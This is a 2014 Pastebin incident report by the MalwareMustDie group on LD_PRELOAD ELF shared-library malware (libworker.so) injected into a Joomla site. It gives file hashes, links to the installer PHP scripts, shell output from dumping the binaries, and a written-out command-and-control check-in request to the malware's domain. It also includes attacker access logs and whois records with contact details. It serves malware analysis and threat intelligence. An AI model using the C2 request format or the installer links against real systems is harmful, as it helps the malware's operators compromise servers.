API tools faq
paste
Advertisement
MalwareMustDie

Recent Incident of Linux ELF (LD_PRELOAD) libworker.so

MalwareMustDie
Jun 10th, 2014
2,549
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 7.24 KB | None | 0 0
raw download clone embed print report
  1. # MalwareMustDie NEW Report of .SO ELF Malware attack incident.
  2. # date: Wed Jun 11 06:38:13 JST 2014
  3. # Analysis by @unixfreaxjp - Report thx to: yin
  4. # Case: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
  5. # CNC is ALIVE in : 89.45.14.64 (VOXILITY, ROMANIA)
  6. # ATTACKER SOURCE IP: 103.31.186.33 (VOXILITY, ROMANIA) &  31.202.247.234 (Leased line ISP Format, UKRAINE)
  7.  
  8. //-------------------------------------
  9. // PHP HACK INJECTION POC
  10. // VICTIMS WEBAPP: JOOMLA!
  11. //-------------------------------------
  12.  
  13. // Reported Injected installation .SO Bins
  14. https://www.virustotal.com/en/file/324b1b77ff9c0759e3d2ab1efb9439a3a850d94bd9f1968a0f093a782b5ea990/analysis/1402437076/
  15. https://www.virustotal.com/en/file/203eeac48d08cac9b36187bfb32bd88d29f1f44d4306f2ffc154538573e5d722/analysis/1402437106/
  16.  
  17. // Jinxed code installer PHP scripts in pastebin:
  18. http://pastebin.com/z1K8jxKJ
  19. http://pastebin.com/Pbsk3ZXU
  20.  
  21. // Malware Binaries extracted from installer PHP:
  22. https://www.virustotal.com/en/file/c28e2ebc5046c1a03a8f689b757cf2a90d021eeaa0a5e9ec91aa33c76ee6237f/analysis/1402437331/
  23. https://www.virustotal.com/en/file/af71138bc3b2e70fd1d8fd33c31a4707d686d893661a331aee68f223348e164e/analysis/1402437372/
  24.  
  25. //-------------------------------------
  26. // CNC ANALYSIS
  27. // Using knowhow from: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
  28. //-------------------------------------
  29.  
  30. // Extract the bins w/ template:
  31. $ date
  32. Wed Jun 11 04:12:11 JST 2014
  33. $
  34. $ php ./sodump-template.php
  35. SO x32 dumped 26848
  36. SO x64 dumped 27288
  37. MO x32 dumped 26848
  38. MO x64 dumped 27288
  39. $
  40. $ ls -alF
  41. total 600
  42. drwxrwxrwx   2 xxx xxx    512 Jun 11 04:12 ./
  43. drwxrwxrwx  13 xxx xxx    512 Jun 11 03:59 ../
  44. -rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 libworker1-32.so
  45. -rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 libworker1-64.so
  46. -rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 libworker2-32.so
  47. -rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 libworker2-64.so
  48.  
  49. $ md5 lib*
  50. MD5 (libworker1-32.so) = 15584bc865d01b7adb7785f27ac60233
  51. MD5 (libworker1-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
  52. MD5 (libworker2-32.so) = 15584bc865d01b7adb7785f27ac60233
  53. MD5 (libworker2-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
  54. // noted see only one x32 and one x64 binaries used for multiple injection..
  55.  
  56.  
  57. $ file lib*
  58. libworker1-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
  59. libworker1-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
  60. libworker2-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
  61. libworker2-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
  62. $
  63.  
  64. // CNC:
  65.  
  66. POST /kuku/theend.php HTTP/1.0
  67. Host: erstoryunics.us
  68. Pragma: 1337
  69. Content-Length: 84
  70.  
  71. R,20130826,64,0,,UNIX SCO System - MalwareMustDie Bangs Moronz CNC,
  72. HTTP/1.1 200 OK
  73. Date: Tue, 10 Jun 2014 22:12:22 GMT
  74. Server: Apache/2.2.15 (CentOS)
  75. X-Powered-By: PHP/5.3.3
  76. Content-Length: 6
  77. Connection: close
  78. Content-Type: text/html; charset=UTF-8
  79. R,200
  80.  
  81. // CNC INFO (NETWORK & GEOIP)
  82.  
  83. $ echo `dig +short erstoryunics.us`|bash origin.sh
  84. Wed Jun 11 06:28:03 JST 2014|89.45.14.64||39743 | 89.45.14.0/24 | VOXILITY | MD | - | IM INTERNET MEDIA SRL
  85. IP Address, City, Country Name, Latitude, longitude, Time Zone
  86. 89.45.14.64, , Romania, 46.0, 25.0, Europe/Bucharest
  87.  
  88. //-------------------------------------
  89. // ATTACK TIME RANGE:
  90. //-------------------------------------
  91.  
  92. First session: [22/May/2014:13:01:08 +1000]
  93. 2nd Session First: [09/Jun/2014:07:50:46 +1000]
  94. 2nd Session Latest:[10/Jun/2014:04:39:51 +1000]
  95.  
  96. //-------------------------------------
  97. // ATTACKER ACCESS POC & SOURCE IP POC:
  98. //-------------------------------------
  99.  
  100. // Attacker access log aiming the PHP .SO Malware installer PHP script:
  101.  
  102. 103.31.186.33 - - [09/Jun/2014:07:50:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
  103. 103.31.186.33 - - [10/Jun/2014:03:34:23 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
  104. 103.31.186.33 - - [10/Jun/2014:04:10:30 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
  105. 103.31.186.33 - - [10/Jun/2014:04:39:51 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
  106. 103.31.186.33 - - [08/Jun/2014:07:56:45 +1000] "GET /cache.php HTTP/1.0" 200 71 "-" "-"
  107. 103.31.186.33 - - [08/Jun/2014:19:50:28 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
  108. 103.31.186.33 - - [08/Jun/2014:21:39:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
  109. 103.31.186.33 - - [08/Jun/2014:22:10:14 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
  110. 103.31.186.33 - - [08/Jun/2014:06:25:18 +1000] "GET /jquery.js.php HTTP/1.0" 200 71 "-" "-"
  111. 31.202.247.234 - - [22/May/2014:13:01:08 +1000] "GET /cache/cache.php HTTP/1.1" 200 17943 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
  112.  
  113.  
  114. //-------------------------------------
  115. // Tracing attacker source IP: 103.31.186.33 (ROMANIA)
  116. //-------------------------------------
  117.  
  118. $ whois 103.31.186.33
  119. % [whois.apnic.net]
  120. % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
  121.  
  122. % Information related to '103.31.186.0 - 103.31.186.127'
  123.  
  124. inetnum: 103.31.186.0 - 103.31.186.127
  125. netname: Saulhost
  126. descr: Saulhost Hosting
  127. country: RO
  128. admin-c: MT669-AP
  129. tech-c: MT669-AP
  130. status: ASSIGNED NON-PORTABLE
  131. remarks: INFRA-AW
  132. mnt-by: MAINT-HK-VOXILITY
  133. mnt-lower: MAINT-HK-VOXILITY
  134. mnt-routes: MAINT-HK-VOXILITY
  135. mnt-irt: IRT-VOXILITY-AP
  136. changed: noc@voxility.com 20130118
  137. source: APNIC
  138.  
  139. irt: IRT-VOXILITY-AP
  140. address: Dimitrie Pompeiu 9-9A
  141. address: Building 24
  142. address: Bucharest 020335
  143. address: Romania
  144. e-mail: noc@voxility.com
  145. abuse-mailbox: noc@voxility.com
  146. admin-c: VOX100
  147. tech-c: VOX100
  148. auth: # Filtered
  149. mnt-by: MAINT-HK-VOXILITY
  150. changed: noc@voxility.com 20121015
  151. source: APNIC
  152.  
  153. person: Michael Ter-Sahakyan
  154. address: Terbatas 14
  155. address: LV-1011 Riga
  156. address: Latvia
  157. country: RO
  158. phone: +37166163312
  159. e-mail: abuses@saulhost.com
  160. nic-hdl: MT669-AP
  161. remarks: INFRA-AW
  162. abuse-mailbox: abuses@saulhost.com
  163. mnt-by: MAINT-HK-VOXILITY
  164. changed: noc@voxility.com 20130118
  165. source: APNIC
  166.  
  167. //-------------------------------------
  168. // Tracing attacker source IP: 31.202.247.234 (UKRAINE)
  169. //-------------------------------------
  170.  
  171.  
  172. $ whois 31.202.247.234
  173. % This is the RIPE Database query service.
  174. % The objects are in RPSL format.
  175. %
  176. % The RIPE Database is subject to Terms and Conditions.
  177. % See http://www.ripe.net/db/support/db-terms-conditions.pdf
  178.  
  179. % Note: this output has been filtered.
  180. % To receive output for a database update, use the "-B" flag.
  181.  
  182. % Information related to '31.202.192.0 - 31.202.255.255'
  183.  
  184. % Abuse contact for '31.202.192.0 - 31.202.255.255' is 'abuse@maxnet.ua'
  185.  
  186. inetnum: 31.202.192.0 - 31.202.255.255
  187. netname: FORMAT-TV-NET-5
  188. descr: MSP Format Ltd.
  189. country: UA
  190. admin-c: FA4288-RIPE
  191. tech-c: FA4288-RIPE
  192. status: ASSIGNED PA
  193. mnt-by: FORMAT-TV-MNT
  194. mnt-domains: FORMAT-TV-MNT
  195. mnt-routes: FORMAT-TV-MNT
  196. source: RIPE # Filtered
  197.  
  198. person: Format Admin
  199. address: Ukraine Mariupol
  200. phone: +380629422490
  201. nic-hdl: FA4288-RIPE
  202. mnt-by: FORMAT-TV-MNT
  203. source: RIPE # Filtered
  204.  
  205. % Information related to '31.202.247.0/24AS6712'
  206.  
  207. route: 31.202.247.0/24
  208. descr: Leased line ISP Format
  209. origin: AS6712
  210. mnt-by: FORMAT-TV-MNT
  211. source: RIPE # Filtered
  212.  
  213.  
  214. ---
  215. #MalwareMustDie!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!